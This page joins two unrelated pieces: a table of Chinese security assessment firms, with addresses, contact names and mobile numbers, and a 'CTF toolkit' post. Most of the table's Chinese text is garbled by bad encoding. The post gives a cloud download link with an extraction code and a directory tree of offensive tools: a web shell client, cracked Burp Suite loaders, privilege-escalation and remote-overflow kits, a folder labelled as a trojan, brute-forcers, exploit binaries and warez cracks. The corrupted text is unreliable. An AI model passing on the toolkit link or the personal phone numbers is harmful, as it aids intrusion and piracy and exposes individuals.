DJCP2011210057	蟜宁浪朮创新信息技术有限公叞	蟜宁省沈阳垂和平区族旺路2号	杚䞹	13614023888	024-83733456	Jan 2011	Jan 2020
DJCP2011210058	倧连理工现代工皋检测有限公叞	蟜宁省倧连垂高新园区蜯件园路80号702A	癜璐	15940988600	0411-84707444	Mar 2011	Mar 2020
DJCP2014210059	蟜宁北方实验宀有限公叞	蟜宁省沈阳垂浑南新区䞉义街6-1号21层02号	朱江	18698895790	024-83785849	Jan 2014	Jan 2020
DJCP2015210060	倧连联合创新科技有限公叞	蟜宁省倧连垂西岗区唐山街24号春晖倧厊2F	杚䞜	13352266918	0411-83613830	Jun 2015	Jun 2021
DJCP2017210061	沈阳欣欣晶智计算机安党检测技术有限公叞	沈阳垂和平区五里河街71号	单泷	13352486777	024-31230868	Sep 2017	Sep 2020
DJCP2011220062	长春启明信息集成服务技术有限公叞	净月经济匀发区癟合街启明蜯件园A座䞀楌	刘昊	15843142072	0431-85906936	Oct 2011	Oct 2020
DJCP2011220063	长春垂博鞿科技服务有限莣任公叞	吉林省长春垂人民倧街280号长江路科技城3A-11A宀	宫平	15948735656	0431-85889980/82789911	Oct 2011	Oct 2020
DJCP2014220064	长春嘉诚信息技术股仜有限公叞	吉林省长春垂高新匀发区越蟟路1188号1号楌	李忆平	13756909388	0431-87013288	Apr 2014	Apr 2020
DJCP2014220065	长春金阳高科技有限莣任公叞	吉林省长春垂南关区人民倧街8683号卫星广场莢富领域5层	王航	18686345592	0431-81179634 ext. 8011	Apr 2014	Apr 2020
DJCP2010230066	黑韙江省信息安党测评䞭心	黑韙江省哈尔滚垂南岗区华山路12号	王倧萌	13796696152 0451-58685745	0451-58685744	Dec 2010	Dec 2019
DJCP2011230067	黑韙江安衡讯信息安党测评技术服务有限公叞	黑韙江省哈尔滚垂南岗区宣化街595号1916宀	匠晶	13901641755 0451-82512217	0451-82512217	Jun 2011	Jun 2020
DJCP2011230068	黑韙江省信息安党测评有限公叞	黑韙江省哈尔滚垂南岗区黄河路136号銙抭䞜苑D座1层	王垞青	13904636388 0451-82286293	0451-87977709	Jun 2011	Jun 2020
DJCP2010310069	囜家眑络䞎信息系统安党产品莚量监督检验䞭心	䞊海垂岳阳路76号	杚灌其	17321110004	021-64719063	Dec 2010	Dec 2019
DJCP2010310070	䞊海垂信息安党测评讀证䞭心	䞊海垂黄浊区陆家浜路1308号	陈颖杰	13917318695 021-63789038	021-63789039	Dec 2010	Dec 2019
DJCP2011310071	䞊海亀通倧孊(信息安党服务技术研究实验宀)	䞊海垂浊䞜新区匠衡路429号	银鹰	13917363365	021-62933691	Jun 2011	Jun 2020
DJCP2012310072	䞊海计算机蜯件技术匀发䞭心	䞊海垂闵行区联航路1588号技术䞭心楌3楌	杚舒怡	13916236146	021-54325591	Jul 2012	Jul 2021
DJCP2017310073	䞊海垂眑络技术绌合应甚研究所	䞊海垂长宁区虹桥路2283号君座5座	马嚁	15821088916	021-62190560	Aug 2017	Aug 2020
DJCP2011320074	江苏金盟检测技术有限公叞	江苏省南京垂錓楌区叀平岗4号C座8层	李云亚	13776693566	025-83736698	Mar 2011	Mar 2020
DJCP2011320075	江苏囜保信息系统测评䞭心有限公叞	江苏省苏州垂十梓街327号	匠灿峰	18651102713	0512-65822512	Mar 2011	Mar 2020
DJCP2011320076	扬州倧自然眑络信息有限公叞	江苏信息服务产䞚基地(扬州)内10号楌	谢宝建	13338851759	0514-87590376 ext. 991	Mar 2011	Mar 2020
DJCP2011320077	江苏骏安信息测评讀证有限公叞	江苏省无锡垂运河䞜路557号时代囜际C座801宀	朱立楷	15961799691	0510-85025859	Mar 2011	Mar 2020
DJCP2011320078	江苏眑擎信息技术有限公叞	江苏省垞州垂钟楌区关河西路119号银苑倧厊1406宀	汪玲	18915883399;18961125566	0519-68887163	Jun 2011	Jun 2020
DJCP2011320079	江苏正信信息安党测试有限公叞	江苏省南通垂人民䞭路139号聚峰楌四楌	匠建荣	13912263999	0513-85797590	Oct 2011	Oct 2020
DJCP2011320080	江苏倩眑计算机技术有限公叞	江苏省南京垂雚花台区雚花倧道2号邊宁科技园3楌	䟯玮	18052008777	025-86883476	Dec 2011	Dec 2020
DJCP2011320081	江苏君立华域安党测评有限公叞	江苏省南京垂江宁经济技术匀发区正方䞭路199号	䜕䌟	18951999086	025-85506088	Dec 2011	Dec 2020
DJCP2011320082	江苏讯安信息安党技术有限公叞	江苏省埐州垂泉山区蜯件园路6号埐州蜯件园2号楌A座811宀	陈臎州	18952156711	0516-83335171	Dec 2011	Dec 2020
DJCP2012320083	江苏安囜信检测技术有限公叞	江苏省苏州垂南园北路118号倩和商务倧厊3B/307	段晓华	15050405060	0512-65730151	Sep 2012	Sep 2018
DJCP2013320084	苏州亿阳倌通科技发展股仜有限公叞	江苏省苏州工䞚园区䞜平街272号亿阳倌通倧厊9楌	王栋	18356986388	0512-62565178	Nov 2013	Nov 2019
DJCP2016320085	南京囜云电力有限公叞	江苏省南京垂玄歊区䞭山路348号	王璐璐	13813858058	025-83192990	May 2016	May 2019
DJCP2010330086	浙江省电子信息产品检验所	浙江省杭州垂倩目山路50号信息技术倧厊	匠君	13588164211	0571-88270553	Jun 2010	Jun 2019
DJCP2010330087	浙江省发展信息安党测评技术有限公叞	浙江省杭州垂环城西路33号	揭建成	13858081792	0571-87050418	Jun 2010	Jun 2019
DJCP2010330088	杭州安信检测技术有限公叞	浙江省杭州垂解攟路111号金钱倧厊1506号	倪祥焕	18058401998	0571-87829530	Jun 2010	Jun 2019
DJCP2010330089	浙江鑫诺检测技术有限公叞	宁波垂海曙区䞜园南路泛亚䞭心16号<4-2>	埐䜳俊	13586565860	0574-87317171	Jun 2010	Jun 2019
DJCP2010330090	浙江䞜安检测技术有限公叞	浙江省杭州垂西湖区莲花街333号莲花商务䞭心A座11楌	吕萍	13958029518	0571-88219330	Jun 2010	Jun 2019
DJCP2011330091	金华安远信息安党检测技术有限公叞	浙江省金华垂䞹溪路1171号韙腟创䞚倧厊1001宀	熊䌟民	13777921702	0579-82726708	Aug 2011	Aug 2020
DJCP2014330092	浙江蟰韙检测技术有限公叞	浙江省杭州垂萧山区宁囎街道民和路481号联合䞭心南区1102宀	汪䞜红	13807936110	0571-85311951	Mar 2014	Mar 2020
DJCP2014330093	浙江方圆检测集团股仜有限公叞	浙江省杭州垂西湖区倩目山路222号	匠元锋	13867479651	0571-85880665	Oct 2014	Oct 2020
DJCP2011340094	安埜省信息安党测评䞭心安埜省电子产品监督检验所	安埜省合肥垂倧西闚赵岗路12号	王氞红	13856999725	0551-2816393	Jan 2011	Jan 2020
DJCP2011340095	䞭囜科孊技术倧孊信息安党测评䞭心	安埜省合肥垂金寚路96号	呚苏皖	18855170782	0551-3607595	Dec 2011	Dec 2020
DJCP2016340096	安埜马钢自劚化信息技术有限公叞信息安党测评䞭心	安埜省马鞍山垂湖南路西端	杚凌珺	13955568920	0555-2886353	Aug 2016	Aug 2019
DJCP2017340097	安埜囜康眑络安党测评有限公叞	安埜省合肥垂倩埜倧厊C座19A	䜙犏生	13485678778	0551-65220080-615	Apr 2017	Apr 2020
DJCP2017340098	安埜等保信息安党测评技术有限公叞	安埜省合肥垂蜀山区黄山路601号科创䞭心307宀	李军	13305698778	0551-66677082	Apr 2017	Apr 2020
DJCP2017340099	合肥倩垷信息安党技术有限公叞	合肥垂政务区怀宁路眮地广场D座1101宀	陶盌盌	18656450708 0551-66165955		Apr 2017	Apr 2020
DJCP2011350100	犏建省眑络䞎信息安党测评䞭心	犏建省犏州垂錓楌区䞜街口利蟟倧厊A-8F	陈䜑康	13615056404 0591-87094647 ext. 8006	0591-87411982	Nov 2011	Nov 2020
DJCP2010360101	江西神舟信息安党评䌰䞭心有限公叞	江西省南昌垂站前路29号京郜実銆12楌	后雷	13507006957	0791-87130727	Dec 2010	Dec 2019
DJCP2011360102	江西省工䞚和信息产品监督检验院	江西省南昌垂犏州路235号	呚晓	13870960189 0791-86379950	0791-86310829	Dec 2011	Dec 2020
DJCP2010370103	山䞜新朮信息技术有限公叞	山䞜省济南垂二环䞜路䞜环囜际广场A座27层	王鹏	18678895763 0531-83532886	0531-83532885	Dec 2010	Dec 2019
DJCP2010370104	联通系统集成有限公叞山䞜省分公叞	山䞜省济南垂垂䞭区经䞉路77号	马钊執	18653176933 0531-81908859	0531-81908859	Dec 2010	Dec 2019
DJCP2010370105	山䞜绎平信息安党测评技术有限公叞	山䞜省济南垂高新区霐鲁蜯件园倧厊202宀	姜竹萍	13791042005	0531-88989939	Dec 2010	Dec 2019
DJCP2010370106	山䞜省电子信息产品检验院(山䞜省眑络䞎信息安党测评䞭心)	山䞜省济南垂山倧路185号	匠睿	18678782858 0531-86993466	0531-86993737	Dec 2010	Dec 2019
DJCP2010370107	青岛速科评测实验宀有限公叞	山䞜省青岛垂厂山区束岭路169号高新区蜯件园蜯件倧厊105宀	邵静	13791909608 0532-55583299	0532-55583298	Dec 2010	Dec 2019
DJCP2010370108	山䞜省计算䞭心囜家超级计算济南䞭心	山䞜省济南垂经十路䞜銖科孊院路19号	呚长䌊	13869119201 0531-82605299	0531-82605299	Dec 2010	Dec 2019
DJCP2011370109	济南时代确信信息安党测评有限公叞	山䞜省济南垂高新区舜华路2000号舜泰广场11号楌2031号	苏瑟	15953111136	0531-88113370	Jun 2011	Jun 2020
DJCP2016370110	浪朮蜯件集团有限公叞蜯件评测实验宀	山䞜省济南垂浪朮路1036号浪朮科技园505楌南6层	宋垞芝	0531-85105607 13964077002	0531-85105700	May 2016	May 2019
DJCP2016370111	济南䞉泜信息安党测评有限公叞	山䞜省济南垂高新区新宇路750号倧孊科技园南区14号楌	杚垆	13695319895	0531-67800766	May 2016	May 2019
DJCP2010410112	河南省金盟信息安党等级技术测评䞭心有限公叞	河南省郑州垂金氎区犏圩路1号8号写字楌B座18-19层	梁宏	18937167888	0371-65777997	Jun 2010	Jun 2019
DJCP2011410113	河南宝通信息安党测评有限公叞	郑州垂郑䞜新区商郜路北站南路西2å¹¢1单元5层501号	袁晓黎	18003710589	0371-60857775	Dec 2011	Dec 2020
DJCP2011410114	河南省錎信信息安党等级测评有限公叞	郑州垂金氎区䞜风路南文博䞜路䞜四号楌502、503号	陈宇	18637101827	0371-67217888	Dec 2011	Dec 2020
DJCP2012410115	河南倩祺信息安党技术有限公叞	河南省郑州垂高新技术匀发区翠竹街总郚䌁䞚基地8栋2层	刘金钊	15036000401	0371-67579921	May 2012	May 2021
DJCP2012410116	河南金鑫信息安党等级技术测评有限公叞	郑州垂金氎区䌘胜南路26号囜奥倧厊13层8号	侁玉钊	13007510591	0371-63973358/63973583 ext. 8003	Jul 2012	Jul 2021
DJCP2011420117	湖北星野科技发展有限公叞	湖北省歊汉垂歊昌区䞭南路2-6号工行广场B栋B座7H宀	王晟	13377874307	027-87816832	Apr 2011	Apr 2020
DJCP2011420118	湖北䞜方眑盟信息安党技术有限公叞	湖北省歊汉垂歊昌区氎果湖䞜䞀路19号B座910宀	倏倩勇	13971119228	027-51817542	Apr 2011	Apr 2020
DJCP2011420119	歊汉明嘉信信息安党检测评䌰有限公叞	湖北省歊汉垂措山区珞南街街道口南村110号鹏皋蕙园2å¹¢29B号	董俊	13871316180	027-87055210	Apr 2011	Apr 2020
DJCP2014420120	歊汉等保测评有限公叞	湖北省歊汉垂江岞区江倧路30号	蔡琎	13129999665	027-82613780	May 2014	May 2020
DJCP2014420121	歊汉安域信息安党技术有限公叞	湖北省歊汉垂埐䞜倧街133号华䞭电力金融倧厊9层	䜕林	18627879046	027-87929550	Apr 2014	Apr 2020
DJCP2011430122	湖南省金盟信息安党等级保技评䌰䞭心有限公叞	长沙高新匀发区岳麓倧道西588号长沙芯城科技园6栋10楌1001房	熊璐	18229931515	0731-88395116	Jan 2011	Jan 2020
DJCP2014430123	䞭囜信息安党测评䞭心华䞭测评䞭心(湖南省信息安党测评䞭心	湖南省长沙垂芙蓉区和光路102号	呚黎	13874913881	0731-84733334	Jan 2014	Jan 2020
DJCP2010440124	广州竞远安党技术股仜有限公叞广䞜省南方信息安党等级保技服务䞭心	广州垂倩河区五山路371-1号䞭公教育倧厊2609-2612单元	王海华	13503017686	020-38483927	Jun 2010	Jun 2019
DJCP2010440125	䞭囜赛宝实验宀工䞚和信息化郚电子第五研究所	广䞜省广州垂倩河区䞜莞庄路110号	路䞹舒	13697420086	020-87236789	Jun 2010	Jun 2019
DJCP2010440126	广州华南信息安党测评䞭心广州垂䞭邊信息工皋有限公叞	广䞜省广州垂越秀区环垂䞜路326号19楌1910宀	马泜灶	15800001624	020-83609489	Jun 2010	Jun 2019
DJCP2010440127	深圳垂信息安党测评䞭心	广䞜省深圳垂犏田区犏䞭路城垂数字资源䞭心	董安波	13590132701	0755-88102210	Jun 2010	Jun 2019
DJCP2010440128	深圳垂眑安计算机安党检测技术有限公叞	广䞜省深圳垂南山区桃源街道孊苑倧道1001号南山智园C1栋13楌	石束奇	13714833734	0755-83768403	Jun 2010	Jun 2019
DJCP2011440129	广䞜南方信息安党研究院	广䞜省广州垂高新技术产䞚匀发区圩频路9号1202B	魏臻	13632294095	020-83314228	Dec 2011	Dec 2020
DJCP2011450130	广西壮族自治区信息安党测评䞭心广西壮族自治区电子信息产品检验所	广西壮族自治区南宁垂星光倧道29号	杚雪君	15607818191	0771-2343335	Mar 2011	Mar 2020
DJCP2011450131	广西眑信信息安党等级保技测评有限公叞	广西南宁垂青秀区䞜葛路118号南宁青秀䞇蟟广场䞜9栋616号	梁森束	13878897887/0771-2867006	0771-2630060	Mar 2011	Mar 2020
DJCP2011460132	海南正邊信息科技有限公叞	海南省海口垂南沙路27号省新华乊店总郚五层	眗坚	13976000868	0898-66286886	Mar 2011	Mar 2020
DJCP2011460133	海南神州垌望眑络有限公叞	海南省海口垂囜莞路48号新蟟商务倧厊31层3103宀	陈超	15103007146	0898-68591652	Jun 2011	Jun 2020
DJCP2015460134	海南䞖纪眑安信息技术有限公叞	海南省海口垂倧同路36号华胜倧厊8层8A2宀	王晗	13637588780	0898-66784777	2015幎6月	2021幎6月
DJCP2010500135	重庆信安眑络安党等级测评有限公叞	重庆垂北郚新区黄山倧道䞭段55号附2号麒麟座D12-8 	呚圊晖	13709418215	023-63759654	2010幎6月	2019幎6月
DJCP2011500136	重庆若可眑络安党测评技术有限公叞	重庆垂北郚新区黄山倧道䞭段氎星科技倧厊䞭后楌3-8	呚非	13002392319	023-62475633	2011幎12月	2020幎12月
DJCP2016500137	重庆巜诺科技有限公叞	重庆垂北郚新区黄山倧道䞭段70号2栋71	饶健	17783855882	023-67031431	2016幎7月	2019幎7月
DJCP2016500138	重庆垂信息通信咚询讟计院有限公叞	重庆垂九韙坡区科园四路257号电信实䞚倧厊	匠晓琎	18983892662	023-68066101	2016幎7月	2019幎7月
DJCP2011510139	成郜久信信息技术股仜有限公叞	四川省成郜垂歊䟯区长华路19号䞇科汇智䞭心30楌	任朋飞	13808170545	028-86677012蜬805	2011幎3月	2020幎3月
DJCP2011510140	 成郜卓越华安信息技术服务有限公叞	四川省成郜垂人民南路四段21号	王健光	17716135596	028-85226536	2011幎3月	2020幎3月
DJCP2011510141	四川省蜯件和信息系统工皋测评䞭心	四川省成郜垂韙泉驿文明䞜街45号	冯䞜	18980075758	028-84863748	2011幎8月	2020幎8月
DJCP2011510142	成郜垂锐信安信息安党技术有限公叞	四川省成郜垂歊候祠暪街18号E-2-1402	祁志敏	13880952189	028-85835877	2011幎10月	2020幎10月
DJCP2012510143	成郜安矎勀信息技术股仜有限公叞	四川省成郜垂高新区倩益街38号理想䞭心4栋701宀	䜕志鹏	18080050351	028-86111797蜬8000	2012幎7月	2021幎7月
DJCP2017510144	成郜创信华通信息技术有限公叞	四川省成郜垂高新区芳沁街86号1层
刘春雚	18980703132	028-85328724	2017幎9月	2020幎9月
DJCP2011520145	莵州省信息䞎计算科孊重点实验宀	莵州省莵阳垂宝山路116号	埐掋	13639087515	 	2011幎6月	2020幎6月
DJCP2011520146	莵州亚蟟集团信息安党技术有限公叞	莵州省莵阳垂延安䞭路1号24楌	林䟝春	13308097901	0851-6907336	2011幎12月	2020幎12月
DJCP2014520147	莵州省眑络䞎信息安党测评讀证䞭心	莵州省莵阳垂延安西路1号建讟倧厊西楌23楌	骆䞁菱	15885508767	0851-86587680	2014幎11月	2020幎11月
DJCP2014520148	莵阳宏囟科技有限公叞(莵州省信息安党评䌰䞭心)	莵州省莵阳垂南明区青云路23号	袁应策	13809427453	0851-85560352	2014幎12月	2020幎12月
DJCP2011530149	云南南倩电子信息产䞚股仜有限公叞信息安党测评䞭心	云南省昆明垂环城䞜路455号	屈旻	13987188661 
0871-8279188	0871-3317397	2011幎3月	2020幎3月
DJCP2013530150	云南瑞讯蟟通信技术有限公叞	云南省昆明垂䞜风路112号附1号	马琳嚜	15887360163	0871-63013359	2013幎9月	2019幎9月
DJCP2014530151	云南联创眑安科技有限公叞	云南省昆明垂盘韙区金州湟.蓝屿A区2å¹¢1单元1001号	孙利增	18213777711	0874-3199439	2014幎12月	2020幎12月
DJCP2015530152	云南厚壁信息安党测评有限公叞	云南省昆明垂经济技术匀发区䜳逞盛景花园二期Ⅲ区1å¹¢1111号	陈志刚	13008689607	0871-63932283	2015幎7月	2021幎7月
DJCP2018530153	云南电信公䌗信息产䞚有限公叞	昆明垂䞜苑路电信枢纜倧楌蟅楌3楌	陈敏	13378719020	 	2018幎5月	2021幎5月
DJCP2018530154	云南无线数字电视文化䌠媒有限公叞	云南省昆明垂人民西路182号	梁厚鞿	15096666010 0871-65366003	 	2018幎5月	2021幎5月
DJCP2011610155	陕西思安信息眑络安党有限公叞	陕西省西安垂高新区科技路30号合力玫郡倧厊B-2001宀	杜明明	18991800058	029-88839363	2011幎1月	2020幎1月
DJCP2011610156	西安捷涊数码科技有限公叞	陕西省西安垂高新区科技二路72号捷普倧厊䞀层南䟧	匠倩	18220502200	029-88452020	2011幎1月	2020幎1月
DJCP2011610157	西安尚易安华信息科技有限莣任公叞	陕西省西安垂碑林区雁塔北路67号红锋商务倧厊8层801宀	郭小鹏	18709189393	029-68905870	2011幎1月	2020幎1月
DJCP2011620158	兰州倧孊应甚技术研究院有限莣任公叞	甘肃省兰州垂城关区倩氎路222号兰州倧孊校本郚气象小二楌	匠桂䞜	13893637425	0931-8914260	2011幎6月	2020幎6月
DJCP2015620159	甘肃安信信息安党技术有限公叞	甘肃省兰州垂读者倧道䞜段58号5号楌	赵晓斌	13919934475	0931-8782081	2015幎6月	2021幎6月
DJCP2011630160	䞭囜电信集团系统集成有限莣任公叞青海分公叞	青海省西宁垂五四倧街23号	李鑫	17709711011	0971-6125116	2011幎10月	2020幎10月
DJCP2012630161	青海省信息䞭心	青海省西宁垂五四西路4号	孙红海	15500505871	0971-6306712	2012幎5月	2021幎5月
DJCP2016630162	青海玉仑信息科技有限公叞	青海省西宁垂海湖新区䞇蟟广场 SOHO A座23楌	孙智才	18209781169	0971-8565529	2016幎11月	2019幎11月
DJCP2011640163	䞭囜电信集团系统集成有限莣任公叞宁倏分公叞	宁倏回族自治区银川垂高新技术匀发区6号路北䟧绌合楌	李氞忠	18995118576	0951-5673673	2011幎10月	2020幎10月
DJCP2011640164	宁倏倧孊	宁倏回族自治区银川垂西倏区莺兰山西路489号	高玉琢	13909584808
0951-2061280	0951-2061883	2011幎12月	2020幎12月
DJCP2014650165	新疆倩行健信息安党测评技术有限公叞	新疆绎吟尔自治区乌鲁朚霐垂倩山区人民路2号乌鲁朚霐倧厊9楌A座	谭然	18140960007	0991-2319298	2017幎11月	2020幎11月
DJCP2016650166	新疆倧孊	新疆绎吟尔自治区乌鲁朚霐垂胜利路14号	袁建廷	13999208020
0991-2338032	0991-8582213	2016幎1月	2019幎1月
DJCP2016650167	新疆倩衡信息系统咚询管理有限公叞	乌鲁朚霐垂黑韙江路12号新界倧厊A座1305宀	杜晓冬	13579220094	0991-7757166	2016幎3月	2019幎3月
DJCP2012660168	新疆固平信息技术有限公叞	新疆乌鲁朚霐经济技术匀发区䞊海路浊䞜街3号-浊䞜街䞉号䌗创空闎1层102-102宀	王晓明	13639906137	0991-5573561	2012幎7月	2021幎7月
DJCP2018340169	安埜溯源电子科技有限公叞	安埜省合肥垂庐阳区濉溪路254号南囜花园16å¹¢602宀	李劍束	17621040613	 	2018幎9月	2021幎9月
DJCP2018340170	安埜信科共创信息安党测评有限公叞	安埜省合肥垂庐阳区阜南路169号䞜怡金融广场B座606宀	仉进	14790912525	 	2018幎9月	2021幎9月

 


CTF toolkit (ctf Toolkit): penetration-testing toolkit and hidden-data cracking


CTF toolkit

Link: https://pan.baidu.com/s/..yQg

Extraction code: xv5p

├── A垞甚工具快捷方匏
│ ├── BurpHelper.jar - 快捷方匏.lnk
│ ├── caidao.exe - 快捷方匏.lnk
│ ├── CTFcrack.jar - 快捷方匏.lnk
│ ├── idaq64.exe.lnk
│ ├── Nmap - Zenmap GUI.lnk
│ ├── Seay源代码审计系统.lnk
│ ├── sqlmap.lnk
│ ├── Stegsolve.jar - 快捷方匏.lnk
│ ├── WinHex64.exe - 快捷方匏.lnk
│ ├── Wireshark.lnk
│ └── 吟爱砎解[LCG].exe - 快捷方匏.lnk
├── Web
│ ├── burpsuite1.6pro
│ │ ├── bapps
│ │ ├── burp-hash.sqlite
│ │ ├── BurpLoader.jar
│ │ ├── burp.sh
│ │ ├── burpsuite_pro_v1.6.jar
│ │ └── run.bat
│ ├── burpsuite_pro_v1.7.30
│ │ ├── BurpHelper.jar
│ │ └── burpsuite_pro_v1.7.30.jar
│ ├── burpsuite_pro_v1.7.30.7z
│ ├── caidao-20160620-www.maicaidao.com.7z
│ ├── Chopper
│ │ ├── 10版
│ │ ├── 16版
│ │ └── Cknife
│ ├── commix
│ │ ├── commix.py
│ │ ├── LICENSE.txt
│ │ ├── readme
│ │ ├── README.md
│ │ └── src
│ ├── md5crack3.rar
│ ├── phpcmsv9 Getshell.py
│ ├── sqlfuzz.txt
│ ├── sqlmap-master.zip
│ ├── TextForever_1.79
│ │ ├── TextForever.exe
│ │ └── TextForever.htm
│ ├── 审计工具
│ │ └── Seay源代码审计系统2.1.zip
│ ├── 匱口什
│ │ ├── darkweb2017-top1000.txt
│ │ ├── pass.txt
│ │ ├── top100.txt
│ │ ├── Top100匱口什.txt
│ │ └── top3000.txt
│ ├── 扫描工具
│ │ ├── 7kbscan-WebPathBrute
│ │ ├── 7kbscan-WebPathBrute T00ls侓版 1.5.8(集成䞉字兞).rar
│ │ ├── AWVS
│ │ ├── awvs.rar
│ │ ├── C段查询工具-[20180103]-7kbscan
│ │ ├── C段查询工具-[20180103]-7kbscan.zip
│ │ ├── GourdScan-master
│ │ ├── nmap-7.40-setup.exe
│ │ ├── SourceLeakHacker-master
│ │ ├── SubDomainSniper 1.1 䞭文版 t00ls.net
│ │ ├── SubDomainSniper 1.1 䞭文版 t00ls.net.rar
│ │ ├── 刷祚
│ │ ├── 埡剑后台扫描珍藏版
│ │ ├── 埡剑后台扫描珍藏版.zip
│ │ ├── 埡剑后台扫描超区85Wå­—å…ž.rar
│ │ └── 摄像倎工具
│ ├── 提权工具
│ │ ├── ms12-020远皋溢出工具
│ │ ├── MS15077提权
│ │ ├── nc提权
│ │ ├── pcanywhere
│ │ ├── php+mysql
│ │ ├── serv-u提权绌合工具.rar
│ │ ├── 䞪人䞓甚马
│ │ ├── 启劚项提权.bat
│ │ ├── 垞见提权工具
│ │ ├── 匀启3389
│ │ ├── 扫目圕.rar
│ │ ├── 补䞁对应提权方匏.txt
│ │ └── 解决tcp限制.rar
│ ├── 数据库工具
│ │ ├── Navicat_for_SQLServer_11.1.13_XiaZaiBa.zip
│ │ └── 蟅臣数据库查看.rar
│ ├── 爆砮
│ │ ├── DUBrute+2.2倚密码爆砎
│ │ ├── hydra-7.3
│ │ ├── K8_FuckOneShell
│ │ ├── OraclePasswords
│ │ └── phpMyAdmin(MySQL)暎力砎解工具v1.3
│ ├── 绌合利甚工具
│ │ ├── crt.rar
│ │ ├── GitHack-master
│ │ ├── GitHack-master.rar
│ │ ├── IISPutScanner.exe
│ │ ├── K8_Ecshop_Exploit_2013_02_22[K8].rar
│ │ ├── K8_Fck_Exploit.exe
│ │ ├── K8 Struts2 Exploit.exe
│ │ ├── K8䞀句话朚马爆砎_1004[K8].rar
│ │ ├── 邮箱采集
│ │ └── 邮箱采集.zip
│ └── 超级SQL泚入工具【SSQLInjection】V1.0 正匏版 20180421
│ ├── config
│ ├── lastConfig.xml
│ ├── logs
│ ├── readme.txt
│ ├── SuperSQLInjection.exe
│ ├── update.txt
│ ├── 视频教皋地址.txt
│ └── 超级SQL泚入工具䜿甚诎明乊V20180422.docx
├── 䞪人CTFtools诎明.txt
├── 取证
│ ├── Elcomsoft Forensic Disk Decryptor
│ │ ├── doa.nfo
│ │ ├── efdd_setup_en.msi
│ │ ├── file_id.diz
│ │ ├── Gold WareZ.nfo
│ │ └── key.txt
│ ├── kali forensics集合.txt
│ ├── 取证倧垈.rar
│ ├── 掚荐乊籍
│ │ ├── Android取证实战调查、分析䞎移劚安党.pdf
│ │ ├── The Art of Memory Forensics.pdf
│ │ ├── Windows取证分析.pdf
│ │ ├── 眑络安党䞎计算机犯眪勘查技术孊.pdf
│ │ ├── 眑络安党-取证䞎蜜眐.pdf
│ │ └── 黑客倧远螪眑络取证栞心原理䞎实践.pdf
│ ├── 日志分析
│ │ └── apache-scalp-master
│ ├── 秋匏眑站日志分析噚.rar
│ └── 计算机安党检查取证系统.zip
├── 文件分析
│ ├── Beyound Compare 3.exe
│ ├── FileAnalysis V2.2.1 D20140401
│ │ └── FileAnalysis
│ ├── FiletypeID
│ │ ├── bz2.pyd
│ │ ├── _ctypes.pyd
│ │ ├── Definitions
│ │ ├── FiletypeID.exe
│ │ ├── FiletypeID.ini
│ │ ├── _hashlib.pyd
│ │ ├── library.zip
│ │ ├── License.txt
│ │ ├── PyQt4.QtCore.pyd
│ │ ├── PyQt4.QtGui.pyd
│ │ ├── python27.dll
│ │ ├── QtCore4.dll
│ │ ├── QtGui4.dll
│ │ ├── ReadMe.txt
│ │ ├── sip.pyd
│ │ ├── _socket.pyd
│ │ ├── _ssl.pyd
│ │ ├── TrIDLib
│ │ └── unicodedata.pyd
│ ├── foremost.exe
│ ├── foremost文件分犻.rar
│ ├── Hex Editor Neo.txt
│ └── Winhex.txt
├── 流量分析
│ ├── USB Monitor Pro.txt
│ ├── Wireshark.txt
│ ├── 安装包
│ │ └── Wireshark-win64-2.2.1.exe
│ └── 掚荐乊籍
│ ├── Wireshark数据包分析实战.pdf
│ └── Wireshark眑络分析就这么简单.pdf
├── 线䞋
│ ├── CTF_FIleMonitor
│ │ ├── CTF_FIleMonitor
│ │ └── CTF_FIleMonitor.sln
│ ├── 搅乱工具
│ │ └── 埪环创建shell文件䞔删陀陀目圕䞋的所有文件.php
│ └── 权限绎持
│ ├── bash
│ └── php
├── 绌合
│ └── v0lt-master
│ ├── AUTHORS
│ ├── COPYRIGHT
│ ├── README.md
│ ├── setup.py
│ ├── v0lt
│ └── v0ltlib
├── 猖码䞎密码
│ ├── ASCII码随心换v3.0.0.1.exe
│ ├── CTFcrack
│ │ ├── CTFcrack.jar
│ │ ├── girl
│ │ ├── Plugin
│ │ └── Setting.json
│ ├── Hash & Crypto Detector v1.4
│ │ ├── AT4RE.nfo
│ │ ├── HCD.exe
│ │ └── Readme.txt
│ ├── JDicTac.jar
│ ├── key_Assistant.exe
│ ├── Keygener_Assistant
│ │ ├── History.txt
│ │ ├── keyAssistant Remixed.exe
│ │ └── Readme.txt
│ ├── online-decode
│ │ ├── app
│ │ ├── base32_decode.html
│ │ ├── base32_encode.html
│ │ ├── base64_decode.html
│ │ ├── base64_encode.html
│ │ ├── crc16.html
│ │ ├── crc32_checksum.html
│ │ ├── crc32.html
│ │ ├── css
│ │ ├── html_decode.html
│ │ ├── html_encode.html
│ │ ├── index.html
│ │ ├── js
│ │ ├── keccak_224.html
│ │ ├── keccak_256.html
│ │ ├── keccak_384.html
│ │ ├── keccak_512.html
│ │ ├── md2.html
│ │ ├── md4.html
│ │ ├── md5_checksum.html
│ │ ├── md5.html
│ │ ├── README.md
│ │ ├── sha1_checksum.html
│ │ ├── sha1.html
│ │ ├── sha224.html
│ │ ├── sha256.html
│ │ ├── sha3_224.html
│ │ ├── sha3_256.html
│ │ ├── sha3_384.html
│ │ ├── sha3_512.html
│ │ ├── sha384.html
│ │ ├── sha512_224.html
│ │ ├── sha512_256.html
│ │ ├── sha512.html
│ │ ├── shake_128.html
│ │ ├── shake_256.html
│ │ ├── url_decode.html
│ │ └── url_encode.html
│ ├── PYG密码孊绌合工具 v5.0.0.5
│ │ ├── PYG.dll
│ │ ├── PYG_TOOLS5.ini
│ │ └── PYG_TOOLS_VER5.exe
│ ├── UNICODE2ANSI.exe
│ ├── Wintools猖码蜬换.exe
│ ├── 䞇胜字笊蜬换Character1.2.exe
│ ├── 加密䞎猖码合集v1.2
│ │ ├── dict
│ │ ├── icudt52.dll
│ │ ├── icuin52.dll
│ │ ├── icuuc52.dll
│ │ ├── libgcc_s_dw2-1.dll
│ │ ├── libstdc++-6.dll
│ │ ├── libwinpthread-1.dll
│ │ ├── platforms
│ │ ├── Qt5Core.dll
│ │ ├── Qt5Gui.dll
│ │ ├── Qt5Widgets.dll
│ │ ├── 加密䞎猖码小工具v1.2.exe
│ │ └── 曎新.txt
│ ├── 加密解密囟和方法
│ │ ├── ADFGX加密法.png
│ │ ├── Blue-punch-card-front-horiz.png
│ │ ├── 二进制加密解密法.txt
│ │ ├── 倒叙加密解密.txt
│ │ ├── 凯撒密码加密.jpg
│ │ ├── 培根密码.jpg
